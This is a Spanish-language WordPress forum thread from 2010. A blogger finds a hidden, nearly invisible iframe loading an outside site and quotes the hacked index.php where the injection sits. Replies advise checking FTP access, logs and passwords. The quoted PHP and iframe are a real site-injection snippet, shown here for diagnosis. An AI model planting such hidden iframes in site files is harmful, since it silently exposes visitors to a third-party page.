Foros del Web » Creando para Internet » Sistemas de gestión de contenidos » WordPress »

Se me coló un "marine" y me colgó un iframe...

Estas en el tema de Se me coló un "marine" y me colgó un iframe... en el foro de WordPress en Foros del Web. Woow... mientras estaba corrigiendo algunos warnings en mi blog , me di cuenta que tenía algo mal en él, fui a ver mi código fuente, ...
  #1 (permalink)  
Antiguo 16/12/2010, 15:20
Avatar de rogertm
Mod->Cuba
 
Fecha de Ingreso: julio-2005
Ubicación: /home/Cuba/Habana/rogertm/
Mensajes: 2.922
Antigüedad: 19 años, 4 meses
Puntos: 638
Se me coló un "marine" y me colgó un iframe...

Woow... mientras estaba corrigiendo algunos warnings en mi blog, me di cuenta que tenía algo mal en él, fui a ver mi código fuente, osea, el html devuelto por el navegador y me encuentro con esto:
Código HTML:
Ver original
  1. <iframe src="http://www.bestwebcam.cz.cc" scrolling="auto" width=1% height=1% frameborder="0"> </iframe>
Mir'e por mi footer.php y mi index.php en mi theme y nada, entonces decidí entrar a mi host y en el index.php de wordpress tenía esto:
Código PHP:
Ver original
  1. <?php
  2. /**
  3.  * Front to the WordPress application. This file doesn't do anything, but loads
  4.  * wp-blog-header.php which does and tells WordPress to load the theme.
  5.  *
  6.  * @package WordPress
  7.  */
  8.  
  9. /**
  10.  * Tells WordPress to load the WordPress theme and output it.
  11.  *
  12.  * @var bool
  13.  */
  14. define('WP_USE_THEMES', true);
  15.  
  16. /** Loads the WordPress Environment and Template */
  17. require('./wp-blog-header.php');
  18. $varri = "http://www.bestwebcam.cz.cc";
  19.  
  20. ?>
  21.  
  22. <iframe src=<?php print $varri; ?> scrolling="auto" width=1% height=1% frameborder="0"> </iframe>
¿Es una bulnerabilidad de WP o tengo que llamar a mi administrador de hostin para tener una charla con él?
__________________
Friki y Blogger por Cuenta Propia:213
Twenty'em: Theming is Prose
  #2 (permalink)  
Antiguo 16/12/2010, 15:55
Avatar de ArturoGallegos
Moderador
 
Fecha de Ingreso: febrero-2008
Ubicación: Morelia, México
Mensajes: 6.774
Antigüedad: 16 años, 9 meses
Puntos: 1146
Respuesta: Se me coló un "marine" y me colgó un iframe...

todos los CMS tienen vulnerabilidades aunque yo si llamaría al soporte del hosting para que te aclaren la duda de como se dio el problema, lo mas seguro es que te dirán fue un cambio vía FTP y te recomendaran cambiar la contraseña y limpiar tus archivos.... pero lo importante sera que te digan el nombre del usuario y la hora en que se efectuó la incidencia, de esa forma tu podrás determinar quien fue el culpable.


de igual forma anticipate a eso y empieza a revisar tus maquinas desde donde tienes acceso al ftp que no tengan virus ni nada, y procede a cambiar la contraseña... generalmente los usuarios usan una contraseña débil esta vez usa una fuerte.
  #3 (permalink)  
Antiguo 16/12/2010, 16:10
Avatar de rogertm
Mod->Cuba
 
Fecha de Ingreso: julio-2005
Ubicación: /home/Cuba/Habana/rogertm/
Mensajes: 2.922
Antigüedad: 19 años, 4 meses
Puntos: 638
Respuesta: Se me coló un "marine" y me colgó un iframe...

Gracias... me dispongo a revisar los Access Logs...
__________________
Friki y Blogger por Cuenta Propia:213
Twenty'em: Theming is Prose
  #4 (permalink)  
Antiguo 16/12/2010, 20:41
Avatar de AlZuwaga
Colaborador
 
Fecha de Ingreso: febrero-2001
Ubicación: 34.517 S, 58.500 O
Mensajes: 14.550
Antigüedad: 23 años, 10 meses
Puntos: 535
Respuesta: Se me coló un "marine" y me colgó un iframe...

Perdón por el offtopic; pero... qué sería un "marine" en este contexto?
(es que intenté entrar a www.bestwebcam.XYZ.BlaBla y me dio errores de PHP... tal vez entrando me enteré lo de "marine", pero no pude)
__________________
...___...
  #5 (permalink)  
Antiguo 16/12/2010, 23:43
Avatar de metacortex
Viejo demente
 
Fecha de Ingreso: junio-2004
Ubicación: Caracas - Venezuela
Mensajes: 9.027
Antigüedad: 20 años, 6 meses
Puntos: 832
Respuesta: Se me coló un "marine" y me colgó un iframe...

Lee esto: http://www.forosdelweb.com/f118/come...9/#post3491617
  #6 (permalink)  
Antiguo 17/12/2010, 08:06
Avatar de rogertm
Mod->Cuba
 
Fecha de Ingreso: julio-2005
Ubicación: /home/Cuba/Habana/rogertm/
Mensajes: 2.922
Antigüedad: 19 años, 4 meses
Puntos: 638
Respuesta: Se me coló un "marine" y me colgó un iframe...

Cita:
Iniciado por metacortex Ver Mensaje
Ya había leído ese comentario tuyo, y creo que hasta te karmé por eso, incluso recuerdo que lo pasé por twitter, ahora para no perderlo lo metí a mis marcadores en delicious.

En cuanto a plugins, el único que usa formularios es Contact Form 7, que me parece es el más usado para este fin y por ende el más seguro (debe al menos serlo), ahora te exigen que instales Really Simple CAPTCHA y me parece bien.

Esto ya me había pasado en otro sitio de los que tenemos en nuestro server, tendremos que ver cual es realmente el problema, y lo mismo me pasó ayer en mi dominio principal, aunque allí lo único que tengo es un simple codiguillo html5, y pregunto ¿debería hacer otra cosa allí?

Cita:
Iniciado por AlZuwaga Ver Mensaje
Perdón por el offtopic; pero... qué sería un "marine" en este contexto?
(es que intenté entrar a www.bestwebcam.XYZ.BlaBla y me dio errores de PHP... tal vez entrando me enteré lo de "marine", pero no pude)


Marine es mi manera de llamar a estos tipos
__________________
Friki y Blogger por Cuenta Propia:213
Twenty'em: Theming is Prose

Etiquetas: iframe
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 09:45.